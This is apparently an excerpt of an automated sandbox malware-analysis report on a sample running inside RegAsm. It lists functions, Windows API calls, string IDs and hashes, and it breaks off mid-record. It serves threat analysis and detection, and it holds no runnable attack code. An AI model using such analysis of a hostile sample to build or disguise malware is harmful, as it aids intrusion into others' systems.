                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                  • String ID: JD
                                                                                                                                                                                                  • API String ID: 1084509184-2669065882
                                                                                                                                                                                                  • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                                                                                                  • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                                                                                                                                  Function 00448484 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 1272433827-2084328917
                                                                                                                                                                                                  • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                                                                                                  • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                                                                                                                                  Function 00446270 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                                                                                                                                                  • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                                                                                                                                                                  Function 1000B5C1 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000B5BC,?,?,00000008,?,?,1000B25C,00000000), ref: 1000B7EE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                  • Opcode ID: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                                                                                                                  • Instruction ID: c899a2dc376e060411cab8954cdd4c29929d9ba6cfa71f030d59b99a2ca162da
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DB16B31610A09CFE755CF28C486B647BE0FF453A4F25C658E89ACF2A5C735E982CB40
                                                                                                                                                                                                  Function 004533AB Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004533A6,?,?,00000008,?,?,0045625D,00000000), ref: 004535D8
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                  • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                                                                                                                                                  • Instruction ID: 7263c04077df6a1dd25da4ac29b5b982fa38ace811980f45f75c7c5cedc24273
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FB13B315106089FD715CF28C48AB657BE0FF053A6F25865DE899CF3A2C339EA96CB44
                                                                                                                                                                                                  Function 004339D7 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                  • Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                                                                                                                                                  • Instruction ID: b5ae8e6f7fa87a7dee9e60626e0a37a25df5f2dd99b83f8da903d7583ecded6c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C129E727083048BD304DF65D882A1EB7E2BFCC758F15892EF495AB381DA74E915CB86
                                                                                                                                                                                                  Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2692324296-0
                                                                                                                                                                                                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                                                                                  • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                                                                                                                                  Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1084509184-0
                                                                                                                                                                                                  • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                                                                                  • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                                                                                                                                  Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.2 Pro), ref: 0040F920
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                  • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                                                                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                                                                                                                  Function 0043E34B Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 0-2084328917
                                                                                                                                                                                                  • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                                                                                                                                                  • Instruction ID: 32d6082e35155a0a096806a6943d6f48c3d67459c64856e3d931f7c23e0710f9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59618971202709A6EE34892B88967BF63949F6D314F10342FE983DB3C1D65DDD82931E
                                                                                                                                                                                                  Function 0043E5A8 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 0-2084328917
                                                                                                                                                                                                  • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                                                                                                                                                  • Instruction ID: 5d22fc1bcc5d638cf6a4a0606be4d5c4d5bba199c703cf788a7f99cafe8d65e8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12615871602718A6DA38592B88977BF2384EB2D344F94351BE483DB3C1D75EAD43871E
                                                                                                                                                                                                  Function 00427AD7 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                  • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                                                                                                                                  • Instruction ID: bbd91956ea41f9089fdf4ea26de33e0e8d132f349ea16d9e77f48d305cf446da
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1412975A183558FC340CF29D58020AFBE1FFC8318F645A1EF889A3350D379E9428B86
                                                                                                                                                                                                  Function 10017194 Relevance: .8, Instructions: 751COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                                                                                  • Instruction ID: 44f99013a838546abf86f75096a930c39f9ce457c7277da91ad5f6740c4fb7fb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89628C316083958FD324DF28C48469ABBF1FF85384F154A2DE9E98B391E771D989CB42
                                                                                                                                                                                                  Function 0044DA49 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                                                                                                                                                  • Instruction ID: 4200599dcb49c21c1ca78238ad82984ca11e49a574bdd01b256a4bdf4e559873
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2322521D69F414DE7239A35CC22336A24CBFB73C5F15D737E81AB5AAAEB29C4834105
                                                                                                                                                                                                  Function 0041F18B Relevance: .6, Instructions: 598COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                                                                                                                                                  • Instruction ID: 06c66d0f35fb266b7f69fbfce4f1f639eb17408d85dd7e5468211ecdc8378744
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7932C2716087459BC715DF28C4807ABB7E5BF84318F040A3EF89587392D779D98ACB8A
                                                                                                                                                                                                  Function 0042742E Relevance: .4, Instructions: 435COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                                                                                                                                                  • Instruction ID: b033fe34555866f616fd3cc64b543b740d9cc82fbf2d17309ab2a27531c6336b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C02CEB17046528BC358CF2EEC5053AB7E1AB8D311744863EE495C7781EB35FA22CB94
                                                                                                                                                                                                  Function 00426E9F Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                                                                                                                                                  • Instruction ID: 06b531cc06dcd57701b547059d2c567c45bbe225ee7d26ac7aed84b394be02a5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DF19D716142558FC348CF1DE8A187BB3E1FB89311B450A2EF582C3391DB79EA16CB56
                                                                                                                                                                                                  Function 00437DB3 Relevance: .3, Instructions: 345COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                                                                                  • Instruction ID: 2ce137016e68017aebaac4bbf916a57dff7c64f07ba89619fc9d118b501662d8
